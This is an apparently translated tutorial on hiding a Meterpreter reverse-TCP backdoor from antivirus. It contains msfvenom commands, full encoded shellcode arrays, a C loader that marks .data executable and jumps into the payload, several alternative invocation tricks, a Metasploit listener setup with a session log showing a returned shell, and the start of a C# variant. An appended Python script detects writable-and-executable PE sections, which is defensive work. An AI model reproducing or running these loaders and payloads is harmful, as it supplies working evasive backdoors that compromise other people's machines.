Evading Antivirus by Separating the Payload from the Backdoor Loader
As is well known, today's antivirus products detect malware in mainly three ways: signature-based, behavior-based and cloud-based scanning, and the characteristics of cloud scanning can largely be summarized as signature matching too. Whichever engine is used, it will inspect the PE file header, and the larger the backdoor program is, the more easily it is detected. Below we implement evasion by separating the ShellCode from the executor that runs it.

Building the backdoor in C

1. First generate the payload with msfvenom:

```
[[email protected] ~]# msfvenom -a x86 --platform Windows \
> -p windows/meterpreter/reverse_tcp \
> -b '\x00\x0b' LHOST=192.168.1.7 LPORT=8888 -f c
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 368 (iteration=0)
x86/shikata_ga_nai chosen with final size 368
Payload size: 368 bytes
Final size of c file: 1571 bytes
unsigned char buf[] =
"\xd9\xc5\xd9\x74\x24\xf4\xba\x8b\xfc\x02\xdd\x5e\x2b\xc9\xb1"
"\x56\x83\xee\xfc\x31\x56\x14\x03\x56\x9f\x1e\xf7\x21\x77\x5c"
"\xf8\xd9\x87\x01\x70\x3c\xb6\x01\xe6\x34\xe8\xb1\x6c\x18\x04"
"\x39\x20\x89\x9f\x4f\xed\xbe\x28\xe5\xcb\xf1\xa9\x56\x2f\x93"
"\x29\xa5\x7c\x73\x10\x66\x71\x72\x55\x9b\x78\x26\x0e\xd7\x2f"
"\xd7\x3b\xad\xf3\x5c\x77\x23\x74\x80\xcf\x42\x55\x17\x44\x1d"
"\x75\x99\x89\x15\x3c\x81\xce\x10\xf6\x3a\x24\xee\x09\xeb\x75"
"\x0f\xa5\xd2\xba\xe2\xb7\x13\x7c\x1d\xc2\x6d\x7f\xa0\xd5\xa9"
"\x02\x7e\x53\x2a\xa4\xf5\xc3\x96\x55\xd9\x92\x5d\x59\x96\xd1"
"\x3a\x7d\x29\x35\x31\x79\xa2\xb8\x96\x08\xf0\x9e\x32\x51\xa2"
"\xbf\x63\x3f\x05\xbf\x74\xe0\xfa\x65\xfe\x0c\xee\x17\x5d\x58"
"\xc3\x15\x5e\x98\x4b\x2d\x2d\xaa\xd4\x85\xb9\x86\x9d\x03\x3d"
"\x9f\x8a\xb3\x91\x27\xda\x4d\x12\x57\xf2\x89\x46\x07\x6c\x3b"
"\xe7\xcc\x6c\xc4\x32\x78\x67\x52\x7d\xd4\x76\xa5\x15\x26\x79"
"\x8b\x5d\xaf\x9f\x9b\xcd\xff\x0f\x5c\xbe\xbf\xff\x34\xd4\x30"
"\xdf\x25\xd7\x9b\x48\xcf\x38\x75\x20\x78\xa0\xdc\xba\x19\x2d"
"\xcb\xc6\x1a\xa5\xf9\x37\xd4\x4e\x88\x2b\x01\x29\x72\xb4\xd2"
"\xdc\x72\xde\xd6\x76\x25\x76\xd5\xaf\x01\xd9\x26\x9a\x12\x1e"
"\xd8\x5b\x22\x54\xef\xc9\x0a\x02\x10\x1e\x8a\xd2\x46\x74\x8a"
"\xba\x3e\x2c\xd9\xdf\x40\xf9\x4e\x4c\xd5\x02\x26\x20\x7e\x6b"
"\xc4\x1f\x48\x34\x37\x4a\xca\x33\xc7\x08\xe5\x9b\xaf\xf2\xb5"
"\x1b\x2f\x99\x35\x4c\x47\x56\x19\x63\xa7\x97\xb0\x2c\xaf\x12"
"\x55\x9e\x4e\x22\x7c\x7e\xce\x23\x73\x5b\xe1\x5e\xfc\x5c\x02"
"\x9f\x14\x39\x03\x9f\x18\x3f\x38\x49\x21\x35\x7f\x49\x16\x46"
"\xca\xec\x3f\xcd\x34\xa2\x40\xc4";
```

The options used above:

- -a: the target architecture of the payload
- --platform: the target platform of the payload
- -p, --payload: the payload to use
- -f, --format: the output format (use --help-formats to list the formats msf supports)
- -b '\x00\x0b': bad characters the encoder must avoid

2. Copy the ShellCode above and open a C source file with the following content:

```c
#include <stdio.h>
#include <windows.h>

//#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"") // hide the console window
#pragma comment(linker,"/INCREMENTAL:NO")      // reduce the size of the compiled binary
#pragma comment(linker,"/section:.data,RWE")   // mark the .data section readable, writable and executable

unsigned char shellcode[] =
"\xd9\xc5\xd9\x74\x24\xf4\xba\x8b\xfc\x02\xdd\x5e\x2b\xc9\xb1"
"\x56\x83\xee\xfc\x31\x56\x14\x03\x56\x9f\x1e\xf7\x21\x77\x5c"
"\xf8\xd9\x87\x01\x70\x3c\xb6\x01\xe6\x34\xe8\xb1\x6c\x18\x04"
"\x39\x20\x89\x9f\x4f\xed\xbe\x28\xe5\xcb\xf1\xa9\x56\x2f\x93"
"\x29\xa5\x7c\x73\x10\x66\x71\x72\x55\x9b\x78\x26\x0e\xd7\x2f"
"\xd7\x3b\xad\xf3\x5c\x77\x23\x74\x80\xcf\x42\x55\x17\x44\x1d"
"\x75\x99\x89\x15\x3c\x81\xce\x10\xf6\x3a\x24\xee\x09\xeb\x75"
"\x0f\xa5\xd2\xba\xe2\xb7\x13\x7c\x1d\xc2\x6d\x7f\xa0\xd5\xa9"
"\x02\x7e\x53\x2a\xa4\xf5\xc3\x96\x55\xd9\x92\x5d\x59\x96\xd1"
"\x3a\x7d\x29\x35\x31\x79\xa2\xb8\x96\x08\xf0\x9e\x32\x51\xa2"
"\xbf\x63\x3f\x05\xbf\x74\xe0\xfa\x65\xfe\x0c\xee\x17\x5d\x58"
"\xc3\x15\x5e\x98\x4b\x2d\x2d\xaa\xd4\x85\xb9\x86\x9d\x03\x3d"
"\x9f\x8a\xb3\x91\x27\xda\x4d\x12\x57\xf2\x89\x46\x07\x6c\x3b"
"\xe7\xcc\x6c\xc4\x32\x78\x67\x52\x7d\xd4\x76\xa5\x15\x26\x79"
"\x8b\x5d\xaf\x9f\x9b\xcd\xff\x0f\x5c\xbe\xbf\xff\x34\xd4\x30"
"\xdf\x25\xd7\x9b\x48\xcf\x38\x75\x20\x78\xa0\xdc\xba\x19\x2d"
"\xcb\xc6\x1a\xa5\xf9\x37\xd4\x4e\x88\x2b\x01\x29\x72\xb4\xd2"
"\xdc\x72\xde\xd6\x76\x25\x76\xd5\xaf\x01\xd9\x26\x9a\x12\x1e"
"\xd8\x5b\x22\x54\xef\xc9\x0a\x02\x10\x1e\x8a\xd2\x46\x74\x8a"
"\xba\x3e\x2c\xd9\xdf\x40\xf9\x4e\x4c\xd5\x02\x26\x20\x7e\x6b"
"\xc4\x1f\x48\x34\x37\x4a\xca\x33\xc7\x08\xe5\x9b\xaf\xf2\xb5"
"\x1b\x2f\x99\x35\x4c\x47\x56\x19\x63\xa7\x97\xb0\x2c\xaf\x12"
"\x55\x9e\x4e\x22\x7c\x7e\xce\x23\x73\x5b\xe1\x5e\xfc\x5c\x02"
"\x9f\x14\x39\x03\x9f\x18\x3f\x38\x49\x21\x35\x7f\x49\x16\x46"
"\xca\xec\x3f\xcd\x34\xa2\x40\xc4";

int main(int argc, char **argv)
{
    __asm
    {
        lea eax, shellcode
        call eax
    }
    return 0;
}
```

Besides the inline-assembly form above, I have also collected a few other ways of invoking the ShellCode:

```c
// Method 1: cast the buffer to a function pointer and call it
void RunShellCode_2()
{
    ((void(*)(void))&shellcode)();
}

// Method 2: load the address and jump to it
void RunShellCode_3()
{
    __asm
    {
        lea eax, shellcode;
        jmp eax;
    }
}

// Method 3: same as method 2, using the offset operator
void RunShellCode_4()
{
    __asm
    {
        mov eax, offset shellcode;
        jmp eax;
    }
}

// Method 4: emit the raw opcode bytes of "jmp eax" (FF E0)
void RunShellCode_5()
{
    __asm
    {
        mov eax, offset shellcode;
        _emit 0xFF;
        _emit 0xE0;
    }
}
```

3. On the MSF control host, start the listener:
```
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > show options
msf5 exploit(multi/handler) > set lhost 192.168.1.7
lhost => 192.168.1.7
msf5 exploit(multi/handler) > set lport 8888
lport => 8888
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.1.7:8888
```

Run our ShellCode program and you will see a shell come back:

```
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.1.7:8888
[*] Sending stage (179779 bytes) to 192.168.1.2
[*] Meterpreter session 1 opened (192.168.1.7:8888 -> 192.168.1.2:36805)
meterpreter > sysinfo
Computer        : lyshark
OS              : Windows 10 (Build 19999).
Architecture    : x64
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter >
```

Building the backdoor in C#

The C# compiler on Windows is named Csc.exe; if your .NET Framework SDK is installed on drive C:, you can find the compiler in the C:\Windows\Microsoft.NET\Framework64 directory.

1. Use MSF to generate the backdoor ShellCode and save it to lyshark.txt:

```
[[email protected] ~]# msfvenom --platform Windows -a x64 -p windows/x64/meterpreter/reverse_tcp_uuid \
> LHOST=192.168.1.30 LPORT=8080 -b '\x00' \
> -e x64/xor -i 10 -f csharp \
> -o ./lyshark.txt
```

The generated ShellCode looks like this:

```
[[email protected] ~]# cat lyshark.txt
byte[] buf = new byte[951] {
0x48,0x31,0xc9,0x48,0x81,0xe9,0x8e,0xff,0x8d,0x05,0xef,0xbb,0xa9,0x1e,0xb2,0x97,0xb9,0xdc,0x04,0x58,0x27,0x2d,0xf8,0xe2,0xf4,0xe1,0x2f,0x7b,0x56,0x16,0x50,0x4f,0xfb,0xfa,0x93,0x92,0x23,0x09,0x0c,0xb8,0xa5,0xb6,0x2c,0x64,0xbd,0xa6,0x4c,0x84,0xe6,0x4d,0x68,0x5b,0x28,0x5e,0xb7,0x78,0x83,0x79,0xf9,0x46,0xfd,0x3c,0xce,0x0a,0x9a,0x03,0xc7,0x18,0x47,0x90,0xc3,0x9d,0x4a,0xe4,0x9b,0x3b,0x7e,0x4e,0x34,0x53,0xf0,0x37,0xca,0x71,0x14,0x99,0x7d,0xbf,0xdf,0x38,0x12,0x08,0x2b,0x42,0xbc,0x98,0x2a,0xf3,0xaf,0x1f,0x67,0xf1,0x35,0x9f,0xd0,0x3f,0x13,0xa2,0xf5,0x88,0xe0,0x26,0xaa,0xb0,0x02,0xa4,0xe5,0x63,0xb1,0x8c,0x75,0xd5,0x06,0xb4,0x30,0x73,0x29,0x80,0xe3,0x0f,0x19,0xd4,0xc4,0x62,0x45,0x1a,0x22,0x5f,0x91,0x0b,0x6d,0x76,0x59,0xe8,0x8a,0xa8,0x8b,0x70,0x5a,0xd8,0xb3,0x82,0xb5,0x86,0x21,0xee,0x3a,0x3d,0xda,0xf2,0x2e,0x6a,0x54,0x5c,0x51,0x36,0xd9,0x43,0xad,0x89,0x3e,0x1c,0x95,0x0d,0x10,0x96,0xc1,0x49,0xed,0xba,0x32,0x52,0x94,0xd7,0xcf,0x65,0x24,0x85,0xab,0x69,0xfc,0xd3,0xdb,0x66,0x44,0x61,0xa1,0xa7,0x20,0xd6,0x7f,0x60,0xeb,0xcd,0x57,0xe7,0x8f,0x1d,0x39,0x6c,0x6e,0xcb,0x17,0x9c,0x9e,0x0e,0xd2,0xa0,0xde,0xd1,0xae,0xf6,0xac,0x07,0xbe,0x11,0xec,0xa3,0x72,0x33,0x87,0xc6,0x40,0x74,0x01,0xea,0x77,0x55,0xc2,0x7c,0x41,0x15,0xc0,0x6f,0x04 };
```

Building the backdoor in Python

(Editor: Li Datong)
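A defender-side check for the C loader built above, added here as an example and not code from the original post: the loader links with `/section:.data,RWE`, so the finished executable carries a section marked both writable and executable, which normally built compiler output does not have. The script parses the PE section table with only the standard library and flags any section carrying both IMAGE_SCN_MEM_WRITE and IMAGE_SCN_MEM_EXECUTE. The two sample images (NORMAL_PE and RWE_LOADER_PE, names of my own choosing) are constructed inline as header-only PE fragments, and scan_file() runs the same check on a real file.

```python
"""Flag PE files whose sections are both writable and executable (RWX).

Added example for this page, not part of the original post.  The sample
PE images below are constructed header-only fragments, not real binaries.
"""
import struct

# Section characteristic flags from the PE/COFF specification.
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def parse_sections(data):
    """Return [(name, characteristics)] from the section table of a PE image."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ/PE image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    # COFF file header: Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    (_machine, nsections, _ts, _symptr, _nsyms,
     opt_size, _flags) = struct.unpack_from("<HHIIIHH", data, coff)
    table = coff + 20 + opt_size        # section table follows the optional header
    sections = []
    for i in range(nsections):
        off = table + i * 40            # each IMAGE_SECTION_HEADER is 40 bytes
        name = data[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        chars = struct.unpack_from("<I", data, off + 36)[0]   # Characteristics
        sections.append((name, chars))
    return sections


def flag_string(chars):
    """Render the memory protection bits as R/W/X letters, e.g. 'RWX'."""
    bits = (("R", IMAGE_SCN_MEM_READ), ("W", IMAGE_SCN_MEM_WRITE),
            ("X", IMAGE_SCN_MEM_EXECUTE))
    return "".join(letter if chars & bit else "-" for letter, bit in bits)


def find_rwx_sections(data):
    """Names of sections that are both writable and executable."""
    return [name for name, chars in parse_sections(data)
            if chars & IMAGE_SCN_MEM_WRITE and chars & IMAGE_SCN_MEM_EXECUTE]


def scan_file(path):
    """Run the RWX check on a file on disk."""
    with open(path, "rb") as f:
        return find_rwx_sections(f.read())


def build_sample_pe(sections):
    """Constructed sample: a minimal DOS stub + PE32 headers + section table.
    Header-only, so it is enough for the parser but is NOT a loadable program."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)           # e_lfanew: PE header at 0x40
    opt_size = 0xE0                                  # PE32 optional header size
    coff = struct.pack("<HHIIIHH", 0x014C, len(sections), 0, 0, 0, opt_size, 0x0102)
    optional = bytearray(opt_size)
    struct.pack_into("<H", optional, 0, 0x10B)       # PE32 magic
    table = b"".join(
        name.ljust(8, b"\0") + struct.pack(
            "<IIIIIIHHI", 0x1000, 0x1000 * (i + 1), 0x200, 0x400 + 0x200 * i,
            0, 0, 0, 0, chars)
        for i, (name, chars) in enumerate(sections))
    return bytes(dos) + b"PE\0\0" + coff + bytes(optional) + table


# Constructed samples: a conventionally linked binary, and one built like the
# loader above where /section:.data,RWE adds EXECUTE to the writable .data.
NORMAL_PE = build_sample_pe([
    (b".text", IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
    (b".data", IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
])
RWE_LOADER_PE = build_sample_pe([
    (b".text", IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
    (b".data", IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ
               | IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_EXECUTE),
])

if __name__ == "__main__":
    for label, image in (("normal", NORMAL_PE), ("rwe-loader", RWE_LOADER_PE)):
        for name, chars in parse_sections(image):
            print(f"{label:11s} {name:8s} {flag_string(chars)}")
        print(f"{label:11s} RWX sections: {find_rwx_sections(image) or 'none'}")
```

Treat a hit as a triage signal rather than a verdict: a writable and executable section is exactly what the `/section:.data,RWE` pragma in the loader produces, but some packers and older toolchains also emit such sections, so the result should be combined with the other indicators of this technique (a large high-entropy byte array in .data, the handler's reverse TCP connection to the LHOST/LPORT baked into the payload).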